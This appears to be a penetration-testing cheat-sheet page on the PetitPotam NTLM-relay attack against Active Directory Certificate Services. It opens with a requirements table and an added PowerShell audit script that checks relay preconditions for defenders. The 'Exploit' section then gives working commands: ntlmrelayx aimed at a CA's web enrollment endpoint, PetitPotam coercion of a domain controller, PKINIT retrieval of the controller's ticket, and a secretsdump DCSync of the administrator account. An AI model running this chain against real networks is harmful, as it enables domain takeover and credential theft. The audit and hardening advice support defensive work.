## Attack requirements

| Feature / Component | Required for PetitPotam | Required for Full Relay to DA via AD CS |
|---|---|---|
| EFSRPC | ✅ Yes | ✅ Yes |
| NTLM Enabled | ✅ Yes | ✅ Yes |
| SMB/LDAP Signing Disabled | ✅ Yes (on relay target) | ✅ Yes (on certsrv or LDAP) |
| AD CS Installed | ❌ No | ✅ Yes |
| Vulnerable AD CS Template | ❌ No | ✅ Yes |
| EPA / Channel Binding Off | ❌ No | ✅ Yes |
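As an added, defender-side example (not from the original page or from the tools it references), the PowerShell audit below checks, on the DC or CA being assessed, the conditions the table lists: SMB signing, LDAP signing, incoming NTLM restriction, whether the AD CS role is present, whether EPA is enforced on the certsrv web enrollment endpoint, and whether an RPC filter for the EFSRPC interface exists. It assumes it is run elevated on a Windows server, that the web enrollment application lives at the default `IIS:\Sites\Default Web Site\CertSrv` path, and that the `c681d488-d850-11d0-8c52-00c04fd90f7e` UUID is the EFSRPC interface targeted by the usual `netsh rpc filter` mitigation; both of those are assumptions to adjust for your environment. Each row reports whether the attacker's requirement from the table is currently met.

```powershell
# Added audit script (not from the original page). Assumptions: runs elevated on
# the DC/CA under review; certsrv is at the default IIS path below; the UUID is
# the EFSRPC interface commonly blocked by an RPC filter. Adjust as needed.
$CertSrvPath = 'IIS:\Sites\Default Web Site\CertSrv'      # assumed default
$EfsRpcUuid  = 'c681d488-d850-11d0-8c52-00c04fd90f7e'     # assumed EFSRPC UUID

$findings = New-Object System.Collections.Generic.List[object]

function Add-Finding {
    param([string]$Requirement, [bool]$AttackerRequirementMet, [string]$Detail)
    $findings.Add([pscustomobject]@{
        Requirement            = $Requirement
        AttackerRequirementMet = $AttackerRequirementMet
        Detail                 = $Detail
    })
}

# EFSRPC reachable: treat it as reachable unless an RPC filter references the interface UUID.
$rpcFilters = (& netsh rpc filter show filter 2>$null) -join "`n"
$efsFiltered = $rpcFilters -match $EfsRpcUuid
Add-Finding 'EFSRPC reachable' (-not $efsFiltered) ("RPC filter for EFSRPC present: $efsFiltered")

# NTLM enabled: RestrictReceivingNTLMTraffic 2 = deny all, 1 = deny domain accounts, 0/absent = allow.
$msv  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0' -ErrorAction SilentlyContinue
$ntlm = if ($null -ne $msv.RestrictReceivingNTLMTraffic) { [int]$msv.RestrictReceivingNTLMTraffic } else { 0 }
Add-Finding 'NTLM enabled (incoming)' ($ntlm -lt 2) "RestrictReceivingNTLMTraffic=$ntlm"

# SMB signing: relay to this host over SMB needs signing not to be required.
try {
    $smb = Get-SmbServerConfiguration -ErrorAction Stop
    Add-Finding 'SMB signing disabled' (-not $smb.RequireSecuritySignature) "RequireSecuritySignature=$($smb.RequireSecuritySignature)"
} catch {
    Add-Finding 'SMB signing disabled' $true "Could not query SMB config: $($_.Exception.Message)"
}

# LDAP signing (DC only): LDAPServerIntegrity 2 = require signing, 1/absent = not required.
$ntds = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters' -ErrorAction SilentlyContinue
if ($ntds) {
    $ldap = if ($null -ne $ntds.LDAPServerIntegrity) { [int]$ntds.LDAPServerIntegrity } else { 1 }
    Add-Finding 'LDAP signing disabled' ($ldap -ne 2) "LDAPServerIntegrity=$ldap"
} else {
    Add-Finding 'LDAP signing disabled' $false 'NTDS parameters not found (host is not a DC)'
}

# AD CS role and EPA on the certsrv endpoint (the relay target in the full chain).
$adcs = Get-WindowsFeature -Name ADCS-Cert-Authority -ErrorAction SilentlyContinue
if ($adcs -and $adcs.Installed) {
    Add-Finding 'AD CS installed' $true 'Certification Authority role present; review template permissions separately'
    try {
        Import-Module WebAdministration -ErrorAction Stop
        $epa = Get-WebConfigurationProperty -PSPath $CertSrvPath `
            -Filter 'system.webServer/security/authentication/windowsAuthentication/extendedProtection' `
            -Name tokenChecking -ErrorAction Stop
        $epaValue = if ($null -ne $epa.Value) { "$($epa.Value)" } else { "$epa" }
        Add-Finding 'EPA / channel binding off on certsrv' ($epaValue -ne 'Require') "tokenChecking=$epaValue"
    } catch {
        Add-Finding 'EPA / channel binding off on certsrv' $true "Could not read IIS config: $($_.Exception.Message)"
    }
} else {
    Add-Finding 'AD CS installed' $false 'Certification Authority role not installed on this host'
}

$findings | Format-Table -AutoSize
```

Run it separately on the domain controller and on the CA, since the LDAP signing and certsrv checks only apply to one of them. Rows that come back with `AttackerRequirementMet = True` are the settings to harden first: requiring SMB and LDAP signing and setting `tokenChecking` to `Require` on certsrv remove the relay targets from the table, and an RPC filter on the EFSRPC interface removes the coercion primitive.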
## Identify
## Exploit

Start ntlmrelayx, pointing it at the CA's web enrollment endpoint and requesting a certificate from the DomainController template:

```bash
sudo ntlmrelayx.py -debug -smb2support --target http://CA01.domain.local/certsrv/certfnsh.asp --adcs --template DomainController
```

At the same time, coerce the DC into authenticating to the attacker host:

```bash
python3 PetitPotam.py <attackerIP> <DCIP>
```

If the relay succeeds, you should receive a base64-encoded certificate in the ntlmrelayx output.

Next, pass that base64 certificate to gettgtpkinit.py to request a Ticket-Granting Ticket (TGT) for the domain controller's machine account:

```bash
python3 /opt/PKINITtools/gettgtpkinit.py DOMAIN.LOCAL/DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache
```

Point Kerberos at the resulting credential cache:

```bash
export KRB5CCNAME=dc01.ccache
```

Attempt DCSync using the DC's TGT:

```bash
impacket-secretsdump -just-dc-user DOMAIN/administrator -k -no-pass "DC01$"@DC01.DOMAIN.LOCAL
```